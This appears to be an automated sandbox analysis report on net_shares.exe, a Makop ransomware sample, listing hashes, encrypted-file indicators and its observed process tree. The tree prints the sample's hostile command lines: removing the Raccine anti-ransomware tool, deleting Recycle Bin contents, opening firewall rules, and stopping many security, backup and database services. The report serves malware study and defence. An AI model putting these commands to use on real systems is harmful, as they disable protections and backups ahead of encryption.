Analysis
-
max time kernel
66s
-
max time network
33s
-
platform
windows7_x64
-
resource
win7v20210408
-
submitted
23-04-2021 13:03
Static task
static1
Behavioral task
behavioral1
Sample
net_shares.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
net_shares.exe
Resource
win10v20210410
General
-
Target
net_shares.exe
-
Size
114KB
-
MD5
07807a9e2aeb0ccc03d88debebcdd2eb
-
SHA1
13a93e6e785d8f42f062b55fe5ea1ba9e0e139ab
-
SHA256
1136907e76399f1d76694ee9c540b387ed6a5b12340b60f3fabfc183bca457df
-
SHA512
1cc1ecab6047c7cc2e81b6b5a9266c25fd9d2a7d26865c0e7554882c0f28f47453fb3c6abc9a613f9af62cf4dd456d079da67897459c9f4d88adb7715547093a
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
makop
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
makop
Signatures
-
Makop
Ransomware family discovered by @VK_Intel in early 2020.
-
Modifies Windows Firewall 1 TTPs
-
Drops startup file 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | net_shares.exe
-
Modifies file permissions 1 TTPs 3 IoCs
Processes:
pid | process
2492 | icacls.exe
2200 | icacls.exe
2124 | icacls.exe
-
Drops file in Program Files directory 20 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files\ApproveJoin.M2V.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\ConnectComplete.mov.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\RestoreUndo.mp3.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\SubmitRepair.vsx.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\CompleteGrant.wmf.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\MoveDisable.wps.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\RedoEnable.png.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\WriteUse.ADTS.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\CompareExport.WTV.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\GrantExpand.xht.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\RenameResolve.bmp.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\RestartConnect.aifc.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\ResumeReceive.ini.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\SearchRestore.asf.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\UnprotectResize.sys.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\NewResolve.contact.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\ReadJoin.ini.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\RemoveLimit.midi.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\SwitchWait.rmi.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Program Files\UseInitialize.svgz.[ID-40707513].uo8bpy | net_shares.exe
-
Drops file in Windows directory 14 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\WindowsShell.Manifest | net_shares.exe
File opened for modification | C:\Windows\WindowsUpdate.log.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\PFRO.log.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\Professional.xml.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\setupact.log.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\Starter.xml.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\win.ini.[ID-40707513].uo8bpy | net_shares.exe
File created | C:\Windows\RESTORE_FILES_INFO.txt | net_shares.exe
File created | C:\Windows\bootstat.dat.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\DtcInstall.log.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\msdfmap.ini.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\system.ini.[ID-40707513].uo8bpy | net_shares.exe
File opened for modification | C:\Windows\TSSysprep.log.[ID-40707513].uo8bpy | net_shares.exe
File created | C:\Windows\WindowsShell.Manifest.[ID-40707513].uo8bpy | net_shares.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
pid | process
2440 | notepad.exe
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1632 | net_shares.exe
Token: SeDebugPrivilege | 512 | taskkill.exe
Token: SeDebugPrivilege | 2384 | taskkill.exe
Token: SeDebugPrivilege | 2404 | taskkill.exe
Token: SeDebugPrivilege | 340 | taskkill.exe
Token: SeDebugPrivilege | 2272 | taskkill.exe
Token: SeDebugPrivilege | 3064 | taskkill.exe
Token: SeDebugPrivilege | 1512 | taskkill.exe
Token: SeDebugPrivilege | 892 | taskkill.exe
Token: SeDebugPrivilege | 2200 | taskkill.exe
Token: SeDebugPrivilege | 2660 | taskkill.exe
Token: SeDebugPrivilege | 1996 | taskkill.exe
Token: SeDebugPrivilege | 2104 | taskkill.exe
Token: SeDebugPrivilege | 3028 | taskkill.exe
Token: SeDebugPrivilege | 1128 | taskkill.exe
Token: SeDebugPrivilege | 2476 | taskkill.exe
Token: SeDebugPrivilege | 2916 | taskkill.exe
Token: SeDebugPrivilege | 1620 | taskkill.exe
Token: SeDebugPrivilege | 3008 | taskkill.exe
Token: SeDebugPrivilege | 2900 | taskkill.exe
Token: SeDebugPrivilege | 1696 | taskkill.exe
Token: SeDebugPrivilege | 1648 | taskkill.exe
Token: SeDebugPrivilege | 956 | taskkill.exe
Token: SeDebugPrivilege | 2508 | taskkill.exe
Token: SeDebugPrivilege | 2472 | taskkill.exe
Token: SeDebugPrivilege | 2700 | taskkill.exe
Token: SeDebugPrivilege | 2688 | taskkill.exe
Token: SeDebugPrivilege | 2876 | taskkill.exe
Token: SeDebugPrivilege | 2276 | taskkill.exe
Token: SeDebugPrivilege | 2488 | taskkill.exe
Token: SeDebugPrivilege | 2704 | taskkill.exe
Token: SeDebugPrivilege | 3064 | taskkill.exe
Token: SeDebugPrivilege | 2156 | taskkill.exe
Token: SeDebugPrivilege | 2820 | taskkill.exe
Token: SeDebugPrivilege | 2980 | taskkill.exe
Token: SeDebugPrivilege | 2116 | taskkill.exe
Token: SeDebugPrivilege | 1032 | taskkill.exe
Token: SeDebugPrivilege | 280 | taskkill.exe
Token: SeDebugPrivilege | 452 | taskkill.exe
Token: SeDebugPrivilege | 2916 | taskkill.exe
Token: SeDebugPrivilege | 3004 | taskkill.exe
Token: SeDebugPrivilege | 1920 | taskkill.exe
Token: SeDebugPrivilege | 2264 | taskkill.exe
Token: SeDebugPrivilege | 2400 | taskkill.exe
Token: SeDebugPrivilege | 2340 | taskkill.exe
Token: SeDebugPrivilege | 2576 | taskkill.exe
Token: SeDebugPrivilege | 2384 | taskkill.exe
Token: SeDebugPrivilege | 2804 | taskkill.exe
Token: SeDebugPrivilege | 2816 | powershell.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | process
1632 | net_shares.exe
-
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
pid | process
1632 | net_shares.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\net_shares.exe "C:\Users\Admin\AppData\Local\Temp\net_shares.exe" (depth 1)
- Drops startup file
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exe "taskkill" /F /IM RaccineSettings.exe (depth 2)
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F (depth 2)
-
C:\Windows\system32\reg.exe "reg" delete HKCU\Software\Raccine /F (depth 2)
- Modifies registry key
-
C:\Windows\system32\schtasks.exe "schtasks" /DELETE /TN "Raccine Rules Updater" /F (depth 2)
-
C:\Windows\system32\cmd.exe "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin (depth 2)
-
C:\Windows\system32\sc.exe "sc.exe" config Dnscache start= auto (depth 2)
-
C:\Windows\system32\sc.exe "sc.exe" config FDResPub start= auto (depth 2)
-
C:\Windows\system32\sc.exe "sc.exe" config SQLTELEMETRY start= disabled (depth 2)
-
C:\Windows\system32\sc.exe "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled (depth 2)
-
C:\Windows\system32\sc.exe "sc.exe" config SSDPSRV start= auto (depth 2)
-
C:\Windows\system32\sc.exe "sc.exe" config SstpSvc start= disabled (depth 2)
-
C:\Windows\system32\cmd.exe "cmd.exe" /c rd /s /q D:\\$Recycle.bin (depth 2)
-
C:\Windows\system32\sc.exe "sc.exe" config SQLWriter start= disabled (depth 2)
-
C:\Windows\system32\sc.exe "sc.exe" config upnphost start= auto (depth 2)
-
C:\Windows\system32\netsh.exe "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes (depth 2)
-
C:\Windows\system32\net.exe "net.exe" start Dnscache /y (depth 2)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 start Dnscache /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop bedbg /y (depth 2)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop bedbg /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" start FDResPub /y (depth 2)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 start FDResPub /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" start SSDPSRV /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 start SSDPSRV /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$SQL_2008 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" start upnphost /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 start upnphost /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop EhttpSrv /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop EhttpSrv /y (depth 3)
-
C:\Windows\system32\netsh.exe "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes (depth 2)
-
C:\Windows\system32\net.exe "net.exe" stop MMS /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MMS /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$SQLEXPRESS /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop ekrn /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ekrn /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop mozyprobackup /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop mozyprobackup /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$SYSTEM_BGC /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop EPSecurityService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop EPSecurityService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$VEEAMSQL2008R2 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$TPS /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$TPS /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop EPUpdateService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop EPUpdateService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop ntrtscan /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ntrtscan /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$TPSAMA /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$TPSAMA /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop EsgShKernel /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop EsgShKernel /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLFDLauncher$SQL_2008 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop PDVFSService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop PDVFSService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop klnagent /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop klnagent /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$VEEAMSQL2008R2 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamCatalogSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamCatalogSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop ESHASRV /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ESHASRV /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SDRSVC /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SDRSVC /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop macmnsvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop macmnsvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$VEEAMSQL2012 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop FA_Scheduler /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop FA_Scheduler /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamCloudSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLFDLauncher$TPS /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop masvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop masvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop KAVFS /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop KAVFS /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamDeploymentService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLWriter /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLWriter /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLFDLauncher$TPSAMA /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MBAMService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MBAMService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop KAVFSGT /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop KAVFSGT /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamBackupSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamBackupSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamDeploySvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLSERVER /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLSERVER /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MBEndpointAgent /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MBEndpointAgent /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop kavfsslp /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop kavfsslp /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamBrokerSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamBrokerSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamEnterpriseManagerSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLServerADHelper /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop mfefire /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop mfefire /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop McAfeeEngineService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop McAfeeEngineService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop wbengine /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop wbengine /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop ReportServer$SQL_2008 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamHvIntegrationSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop avpsus /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop avpsus /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLServerADHelper100 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop mfemms /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop mfemms /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop McAfeeDLPAgentService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop McAfeeDLPAgentService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop wbengine /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop wbengine /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop McAfeeFramework /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop McAfeeFramework /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop mfewc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop mfewc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamMountSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamMountSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop ccEvtMgr /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ccEvtMgr /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop RESvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop RESvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop mfevtp /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop mfevtp /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQLServerOLAPService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQLServerOLAPService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop ccSetMgr /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop ccSetMgr /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop BMR Boot Service /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop BMR Boot Service /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop McAfeeFrameworkMcAfeeFramework /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SavRoam /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SavRoam /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop sms_site_sql_backup /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop sms_site_sql_backup /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamNFSSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop RTVscan /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop RTVscan /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLAgent$BKUPEXEC /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop NetBackup BMR MTFTP Service /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MySQL57 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MySQL57 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop QBFCService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop QBFCService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop DefWatch /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop DefWatch /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MSSQL$SOPHOS /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop MSSQL$SOPHOS /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop McShield /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop McShield /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop QBIDPService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop QBIDPService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VSNAPVSS /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VSNAPVSS /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamRESTSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamRESTSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop Intuit.QuickBooks.FCS /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamTransportSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLAgent$CITRIX_METAFRAME /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop sacsvr /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop sacsvr /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop QBCFMonitorService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop QBCFMonitorService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamDeploymentService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop MySQL80 /y (depth 2)
-
C:\Windows\system32\net.exe "net.exe" stop McTaskManager /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop McTaskManager /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLAgent$CXDB /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$CXDB /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop YooBackup /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop YooBackup /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamNFSSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop VeeamTransportSvc /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SAVAdminService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SAVAdminService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop YooIT /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop YooIT /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop OracleClientCache80 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop OracleClientCache80 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop veeam /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop veeam /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLAgent$ECWDB2 /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop zhudongfangyu /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop zhudongfangyu /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SQLAgent$PRACTTICEBGC /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop PDVFSService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop PDVFSService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop SAVService /y (depth 2)
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 stop SAVService /y (depth 3)
-
C:\Windows\system32\net.exe "net.exe" stop stc_raw_agent /y (depth 2)
-
